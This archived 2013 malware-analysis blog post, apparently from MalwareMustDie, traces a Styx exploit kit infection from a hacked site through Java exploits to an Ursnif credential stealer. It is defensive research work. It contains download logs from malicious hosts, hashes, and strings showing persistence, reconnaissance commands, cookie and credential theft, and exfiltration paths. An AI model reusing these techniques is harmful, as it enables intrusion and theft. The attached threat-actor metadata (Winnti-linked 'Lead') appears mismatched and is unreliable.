{
	"id": "f6ecdb4b-0eaf-46ff-b489-34293c5664dc",
	"created_at": "2026-04-06T00:17:24.848636Z",
	"updated_at": "2026-04-10T03:23:52.382746Z",
	"deleted_at": null,
	"sha1_hash": "2adc306b09b87e804b2c5dc6783ea46e705c7ccd",
	"title": "The infection of Styx Exploit Kit (Landing page: painterinvoice.ru + Payload: PWS/Ursnif Variant)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 470812,
	"plain_text": "The infection of Styx Exploit Kit (Landing page: painterinvoice.ru\r\n+ Payload: PWS/Ursnif Variant)\r\nPublished: 2013-02-03 · Archived: 2026-04-05 21:57:55 UTC\r\nInfection route:\r\nInfector: h00p:\r\nRedirector: h00p:\r\nDownloader1: h00p:\r\nLead to: (same path)/imJTuXe.jar\r\nDownloader2: h00p:\r\nPayload: h00p:\r\nInfector hosts:\r\nInfector (hacked site): tropold.org (209.8.45.242)\r\nLanding Page: painterinvoice.ru (108.61.12.43)\r\nPayload (hacked site): fuji-solar.co.jp (60.43.201.33)\r\nPoC:\r\nInfector:\r\n--2013-02-03 02:22:15-- h00p:\r\nResolving tropold.org... seconds 0.00, 209.8.45.242\r\nCaching tropold.org =\u003e 209.8.45.242\r\nConnecting to tropold.org|209.8.45.242|:80... seconds 0.00, connected.\r\n:\r\nGET /jerk.cgi?6 HTTP/1.0\r\nReferer: http:\r\nUser-Agent: We are MalwareMustDie! You are on our blog!\r\nHost: tropold.org\r\nhttp://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html\r\nPage 1 of 16\r\n:\r\nHTTP/1.1 200 OK\r\nDate: Sat, 02 Feb 2013 19:03:31 GMT\r\nServer: Apache\r\nSet-Cookie: thlpg6=_1_; expires=Sun, 03-Feb-2013 19:03:31 GMT; path=/; domain=tropold.org\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n:\r\n200 OK\r\nLength: unspecified [text/html]\r\nSaving to: `jerk.cgi@6.1'\r\n2013-02-03 02:22:15 (1.49 MB/s) - `jerk.cgi@6.1' saved [182]\r\n＜html＞＜frameset rows= \"100%\" ＞\r\n＜/frameset＞\r\n＜/html＞\r\nRedirectors:\r\n--2013-02-03 02:23:29-- h00p:\r\nB0c4Vm12yDo0Xvu50mkZ10gv2o0FwTJ0kT3S0y2Lp0cz4L0JlPp0fzIh0oYGU0XFea\r\nResolving painterinvoice.ru... seconds 0.00, 108.61.12.43\r\nCaching painterinvoice.ru =\u003e 108.61.12.43\r\nConnecting to painterinvoice.ru|108.61.12.43|:80... seconds 0.00, connected.\r\n:\r\nGET /1yM1hP12juZ0eb1m08qSE0gC6f01z5B0c4Vm12yDo0Xvu50mkZ10gv2o0FwTJ0kT3S0y2Lp0cz4L0JlPp0fzIh0oYGU0XFea H\r\nReferer: http:\r\nUser-Agent: We are MalwareMustDie! You are on our blog!\r\nHost: painterinvoice.ru\r\nHTTP request sent, awaiting response...\r\n:\r\nHTTP/1.0 302 Found\r\nSet-Cookie: PHPSESSID=2pt94m2itjr49i320maohs0r30; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nX-Powered-By: Application Error....\r\nServer: QRATOR\r\nLocation: h00p:\r\nContent-type: text/html\r\nContent-Length: 0\r\nConnection: keep-alive\r\nDate: Sat, 02 Feb 2013 17:27:06 GMT\r\n:\r\n302 Found\r\n:\r\nLocation: h00p:\r\nSkipping 0 bytes of body: [] done.\r\n--2013-02-03 02:23:30-- h00p:\r\nReusing existing connection to painterinvoice.ru:80.\r\n:\r\nGET /1yM1hP12juZ0eb1m08qSE0gC6f01z5B0c4Vm12yDo0Xvu50mkZ10gv2o0FwTJ0kT3S0y2Lp0cz4L0JlPp0fzIh0oYGU0XFea/\r\nReferer: http:\r\nUser-Agent: We are MalwareMustDie! You are on our blog!\r\nHost: painterinvoice.ru\r\n:\r\nHTTP/1.0 200 OK\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nX-Powered-By: Application Error....\r\nServer: QRATOR\r\nContent-Type: text/html\r\nX-Mode: HTML\r\nContent-Length: 490\r\nConnection: keep-alive\r\nDate: Sat, 02 Feb 2013 17:27:07 GMT\r\n:\r\n200 OK\r\nLength: 490 [text/html]\r\nSaving to: `index.html'\r\n2013-02-03 02:23:31 (13.4 MB/s) - `index.html' saved [490/490]\r\n＜html＞\r\n＜head＞\r\n＜title＞TTklldd＜/title＞\r\n＜/head＞\r\n＜body＞\r\n＜applet archive= \"imJTuXe.jar\" code= \"kobCA.Qbyka\" name= \"vNOArj\" ＞\r\n＜/applet＞\r\n＜script type= \"text/javascript\" src= \"rtoplsf.js\" ＞＜/script＞\r\n＜/body＞\r\n＜/html＞\r\nDownloader:\r\n↑See the ISRonx04...607Atz/getmyfile.exe?o=1\u0026h=11; this is the downloader scheme of this exploit kit. It forwards you to the JAR download URL:\r\nh00p:\r\nDownload...\r\n--2013-02-03 02:26:40-- h00p:\r\nResolving painterinvoice.ru... seconds 0.00, 108.61.12.43\r\nCaching painterinvoice.ru =\u003e 108.61.12.43\r\nConnecting to painterinvoice.ru|108.61.12.43|:80... seconds 0.00, connected.\r\n:\r\nGET /spM4XE0q6I0074Rr0gZq70QF520sJWu0pqgQ0QET4131rg0YCPL07RJk0ePNF0VV9X0313c0JKqP0Kx3Z0l4D00nDue0ujSn/i\r\nReferer: http:\r\nUser-Agent: We are MalwareMustDie! You are on our blog!\r\nHost: painterinvoice.ru\r\nHTTP request sent, awaiting response...\r\n:\r\nHTTP/1.0 200 OK\r\nSet-Cookie: PHPSESSID=d8l9gc7g9vbg0poai41h97r7c6; path=/\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nX-Powered-By: Application Error....\r\nServer: QRATOR\r\nContent-Type: text/html\r\nX-Mode: HTML\r\nConnection: close\r\nDate: Sat, 02 Feb 2013 17:30:16 GMT\r\n:\r\n200 OK\r\nLength: unspecified [text/html]\r\nSaving to: `imJTuXe.jar'\r\n2013-02-03 02:26:41 (14.5 KB/s) - `imJTuXe.jar' saved [12996]\r\nExploitation\r\nThe target privilege:\r\nThe flood:\r\nCVE-2012-1723\r\nCVE-2012-4681\r\nThis JAR at Virus Total, URL --\u003e\u003e[HERE]\r\nSHA256: ca601ec85cc7bc2afa82384a1b832401af281e476021b1db59201bb8d0936211\r\nSHA1: e3f1b938ef96c139b948c6bd9cc69d7c2dec0643\r\nMD5: 9c4ca2083a2c4cd518897ab59df3a15c\r\nFile size: 12.7 KB ( 12996 bytes )\r\nFile name: imJTuXe.jar\r\nFile type: JAR\r\nTags: exploit jar cve-2012-1723 cve-2012-4681\r\nDetection ratio: 10 / 46\r\nAnalysis date: 2013-02-03 08:07:39 UTC ( 2 hours, 36 minutes ago )\r\nMalware names:\r\nDrWeb : Exploit.CVE2012-1723.13\r\nGData : Java:CVE-2012-1723-VT\r\nAntiVir : EXP/2012-1723.GE\r\nTrendMicro : HEUR_JAVA.EXEC\r\nMcAfee-GW-Edition : Exploit-CVE2012-1723.c\r\nAvast : Java:CVE-2012-1723-VT [Expl]\r\nESET-NOD32 : probably a variant of Java/Exploit.CVE-2012-1723.FR\r\nMcAfee : Exploit-CVE2012-1723.c\r\nIkarus : Java.CVE.2012\r\nSophos : Troj/JavaDl-NZ\r\nThe JAR resulted in the URL below:\r\nh00p:\r\nAgain we meet the \"..0mMLQ/getmyfile.exe\" downloader, which now points to the payload URL below:\r\nh00p:\r\nIt's still up there.. (make the necessary warning though...)\r\nDownload log:\r\nGET /date/dune.exe HTTP/1.0\r\nUser-Agent: MalwareMustDie! You are famous now!\r\nHost: fuji-solar.co.jp\r\nHTTP request sent, awaiting response...\r\n:\r\nHTTP/1.1 200 OK\r\nDate: Sat, 02 Feb 2013 17:20:04 GMT\r\nServer: Rapidsite/Apa\r\nLast-Modified: Sat, 02 Feb 2013 12:26:52 GMT\r\nETag: \"35dd625-37400-510d060c\"\r\nAccept-Ranges: bytes\r\nContent-Length: 226304\r\nKeep-Alive: timeout=15, max=100\r\nConnection: Keep-Alive\r\nContent-Type: application/exe\r\n:\r\n200 OK\r\nRegistered socket 1896 for persistent reuse.\r\nLength: 226304 (221K) [application/exe]\r\nSaving to: `dune.exe'\r\nPayload at Virus Total, url is here --\u003e\u003e[HERE]\r\nSHA256: 0e61ecd0aad87a72d36bc10288303292859a800d2237ac9c32755d9e455e87e2\r\nSHA1: a7344edd33d4bcd538fdba240c2996417a0d63b8\r\nMD5: a26ff2a7664aaa03d41a591fc71d2221\r\nFile size: 221.0 KB ( 226304 bytes )\r\nFile name: dune.exe\r\nFile type: Win32 EXE\r\nTags: peexe\r\nDetection ratio: 3 / 46\r\nAnalysis date: 2013-02-03 07:09:05 UTC ( 38 minutes ago )\r\nMalware Name:\r\nTrendMicro-HouseCall : TROJ_GEN.F47V0202\r\nDrWeb : Trojan.KillProc.22029\r\nSymantec : WS.Reputation.1\r\n↑Low detection. It looks like we will see many infections happen..\r\nI wrote the quick analysis on this malware in a VT comment, with additional information below:\r\nAs I wrote in the VT comment, this malware killed explorer.exe \u0026 started a new one, as I reproduced below:\r\nHow did this malware do it, and what for? Below could be the answer:\r\nFirst, it creates 1958718(RANDOM).bat in the current directory. PoC traces:\r\n\"WriteFile\" , \"C:\\Documents and Settings\\%USER%\\%DESKTOP%\\1958718.bat\" , \"SUCCESS\" , \"Offset: 0, Length: 72\"\r\nAnd executed it with a CMD command to re-run explorer \u0026 delete the malware files:\r\n\"Process Create\" , \"C:\\WINDOWS\\system32\\cmd.exe\" , \"SUCCESS\" , \"PID: 2916, Command line: cmd /c \" \"\" \"C:\\Documents and Settings\\%USER%\\%DESKTOP%\\1958718.bat\" \"\r\nWith the batch command below:\r\n(361): /sd %lu\r\n(363): %lu.bat \"\r\n(364): attrib -r -s -h %%1\r\n(365): del %%1\r\n(366): if exist %%1 goto %u\r\n(367): del %%0\r\n(369): %s\\explorer.exe\"\r\nThis act is to hide the real malware activities and to delete the malware files from the PC after being executed.\r\nWhat happened while explorer.exe was terminated:\r\nIt created C:\\WINDOWS\\system32\\fastinit.exe(RANDOM) (a self copy) \u0026 made it autostart in the registry by setting these key/values:\r\n\"CreateFile\" , \"C:\\WINDOWS\\system32\\fastinit.exe\" , \"SUCCESS\" , \"OpenResult: Created\"\r\n\"RegSetValue\" , \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\helplist(RANDOM)\" , \"SUCCESS\" , \"Type: REG_SZ, Length: 66, Data: C:\\WINDOWS\\system32\\fastinit.exe\"\r\nNOTE: The malware chose the name of the file it copies itself to AFTER investigating which EXE files actually exist on your PC, picking one of them as the target name for the copy. PoC --\u003e\u003e[HERE]\r\nFurthermore, randomization is also used to pick the autostart registry key name: in this case it was Windows\\CurrentVersion\\Run\\helplist, while in VT I detected \\Windows\\CurrentVersion\\Run\\autocnfg, and the VT behavior test itself shows \\Windows\\CurrentVersion\\Run\\blassmgr.\r\nThe rest of the registry changes are as below:\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\helplist\" , \"SUCCESS\" , \"Type: REG_SZ, Length:\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Personal\" , \"SUCCESS\" , \"Ty\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Cache\" , \"SUCCESS\" , \"Type:\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\{11948642-10a9-11e2-95b6-806d6172\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\MountPoints2\\{903f3d4c-6ae4-11e2-91fb-0012f0e9\r\n\"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Common Documents\" , \"SUCCESS\"\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\\Desktop\" , \"SUCCESS\" , \"Typ\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass\" , \"SUCCESS\"\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName\" , \"SUCCESS\"\r\n\"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet\" , \"SUCCESS\"\r\nSince the malware binary was encrypted we can't see much of it; if you look at the binary's .text section it will appear like this:\r\nFile: dune.exe; Section: .text\r\nEncrypted part:\r\n0x0004FF 0x0004FF ＞====\r\n0x000515 0x000515 ====6?y＞6?y\r\n0x00052B 0x00052B 5=Hh2\r\n0x000531 0x000531 2====a\r\n0x00055B 0x00055B c＞====\r\n0x000582 0x000582 ＞?Ay=|=\r\n0x0005A9 0x0005A9 Rn=y=\r\n0x0005AF 0x0005AF 35Ln=y=\r\n0x0005E0 0x0005E0 3＞====\r\n0x000610 0x000610 ===g===\r\n0x00062D 0x00062D %,A＞h\r\n0x000645 0x000645 a5===\r\n0x0006BD 0x0006BD n====g==5==\r\n: : :\r\n0x03646F 0x03646F R |=A3\r\n0x03662A 0x03662A %H2%n?\r\n0x036642 0x036642 A57 ＞\r\n0x03668E 0x03668E ＞6=dg＞\r\nThe complete list is here --\u003e\u003e[HERE]\r\nbut after being decrypted we start to understand better how it works.\r\nThe .rdata section then appears to contain some readable values.\r\nWe can see the list of calls here --\u003e\u003e[HERE]\r\nAnd the breakdown of the stealer++ activities is as below:\r\nSome comments of the malware coder, with misspelled words:\r\n.rdata:100124E4 00000010 C Sart Load DLL\\r\\n\r\n.rdata:100124F4 0000001D C Loading DLL: \\\"%s\\\" size: %d\\r\\n\r\n.rdata:10012514 00000012 C Start Write DLL\\r\\n\r\n.rdata:10012528 00000016 C DLL load status: %u\\r\\n\r\n.rdata:10012658 0000001C C Started Soccks status {%u\\n}\r\n.rdata:10012674 00000014 C Get info status %u\\n\r\n.rdata:10012688 00000017 C Command received \\\"%s\\\"\\n\r\n.rdata:100126A0 0000000C C MakeScreen\\n\r\nSo it is supposed to connect to the internet...\r\n.rdata:10012C64 00000008 C http:\r\n.rdata:10012C6C 00000009 C https:\r\n.rdata:10012A94 00000006 C Host:\r\n.rdata:10012A9C 0000000C C User-Agent:\r\n.rdata:10012AA8 00000010 C Content-Length:\r\n.rdata:10012AB8 00000013 C Transfer-Encoding:\r\n.rdata:10012BDC 0000000A C text/html\r\n.rdata:10012BE8 00000006 C image\r\n.rdata:10012BF0 0000000A C Referer:\r\n.rdata:10012BFC 0000001A C URL: %s\\r\\nuser=%s\\r\\npass=%s\r\nWhile these show what it grabs.. (an Ursnif trademark)\r\n.rdata:10012CA4 00000005 C @ID@\r\n.rdata:10012CB0 00000008 C @GROUP@\r\n.rdata:10012CB8 00000007 C grabs=\r\n.rdata:10012CC0 00000008 C NEWGRAB\r\n.rdata:10012CC8 0000000B C SCREENSHOT\r\n.rdata:10012CD4 00000008 C PROCESS\r\n.rdata:10012CDC 00000007 C HIDDEN\r\n.rdata:10012CE4 00000005 C @%s@\r\n.rdata:10012CEC 00000005 C http\r\n.rdata:10012CF4 00000005 C POST\r\n.rdata:10012CFC 0000000A C URL: %s\\r\\n\r\n..or this one will show you better...\r\n.rdata:10012948 0000001D C cmd /C \\\"systeminfo.exe \u003e %s\\\"\r\n.rdata:10012968 0000001B C failed start sysinfo - %u\\n\r\n.rdata:10012984 0000001D C cmd /C \\\"echo -------- \u003e\u003e %s\\\"\r\n.rdata:100129A4 00000021 C cmd /C \\\"tasklist.exe /SVC \u003e\u003e %s\\\"\r\n.rdata:100129C8 0000001C C failed start tasklist - %u\\n\r\n.rdata:100129E4 0000001F C cmd /C \\\"driverquery.exe \u003e\u003e %s\\\"\r\n.rdata:10012A04 0000001A C failed start driver - %u\\n\r\n.rdata:10012A20 0000005B C cmd /C \\\"reg.exe query \\\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\\r\n.rdata:10012A7C 00000015 C failed get reg - %u\\n\r\nThe credentials targeted....\r\n0x010F44 \\Mozilla\\Firefox\\Profiles\\\r\n0x010F7C cookies.sqlite\r\n0x010F9C cookies.sqlite-journal\r\n0x010FCC \\Macromedia\\Flash Player\\\r\n0x011000 *.sol\r\n0x01100C *.txt\r\n0x011018 \\sols\r\n0x011024 \\cookie.ie\r\n0x01103C \\cookie.ff\r\n0x011678 image/gif\r\nWe'll see usage of a PHP form on the server side:\r\n.rdata:100126E8 00000005 C form\r\n.rdata:100126F0 0000004B C /data.php?version=%u\u0026user=%08x%08x%08x%08x\u0026server=%u\u0026id=%u\u0026type=%u\u0026name=%s\r\n.rdata:10012758 0000007B C version=%u\u0026user=%08x%08x%08x%08x\u0026server=%u\u0026id=%u\u0026crc=%08X\u0026wake=%u\u0026prjct=%d\u0026a\r\n.rdata:100127D8 0000000D C /c%s.php?%s=\r\n:\r\n.rdata:10012E10 00000042 C Content-Disposition: form-data; name=\\\"upload_file\\\"; filename=\\\"%s\\\"\r\n.rdata:10012E58 00000048 C Content-Disposition: form-data; name=\\\"upload_file\\\"; filename=\\\"%.4u.%lu\\\"\r\n.rdata:10012EA0 00000027 C --------------------------%04x%04x%04x\r\n.rdata:10012EC8 0000002F C Content-Type: multipart/form-data; boundary=%s\r\n.rdata:10012EF8 0000000B C \\r\\n--%s--\\r\\n\r\n.rdata:10012F04 00000027 C Content-Type: application/octet-stream\r\n.rdata:10012F2C 00000011 C --%s\\r\\n%s\\r\\n%s\\r\\n\\r\\n\r\nSetting the target directory for the grabbed stuff:\r\n.rdata:100128A4 0000001B C .set DiskDirectory1=\\\"%s\\\"\\r\\n\r\n.rdata:100128C0 00000019 C .set CabinetName1=\\\"%s\\\"\\r\\n\r\n.rdata:100128DC 00000007 C \\\"%s\\\"\\r\\n\r\n.rdata:100128EC 0000001B C .set DestinationDir=\\\"%S\\\"\\r\\n\r\n.rdata:1001290C 00000007 C \\\"%S\\\"\\r\\n\r\nAnd making a CAB archive of the target..\r\n.rdata:10012914 00000014 C makecab.exe /F \\\"%s\\\r\nI thank you @EP_X0FF kernel mode for the very good help solving this mystery.\r\nIt is a PWS variant alright, with the malware name of Trojan Ursnif.\r\nThe complete list of the .RDATA section is here --\u003e\u003e[HERE]\r\nSamples\r\n*) We share samples for research purposes \u0026 for raising the detection ratio of this infection.\r\nInfection sample set --\u003e\u003e[HERE]\r\nThe malware's complete recorded process can be downloaded in the archive here --\u003e\u003e[HERE]\r\nThanks to @kafeine for the infection info.\r\n#MalwareMustDie!\r\nSource: http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html"
	],
	"report_names": [
		"the-infection-of-styx-exploit-kit.html"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434644,
	"ts_updated_at": 1775791432,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2adc306b09b87e804b2c5dc6783ea46e705c7ccd.pdf",
		"text": "https://archive.orkl.eu/2adc306b09b87e804b2c5dc6783ea46e705c7ccd.txt",
		"img": "https://archive.orkl.eu/2adc306b09b87e804b2c5dc6783ea46e705c7ccd.jpg"
	}
}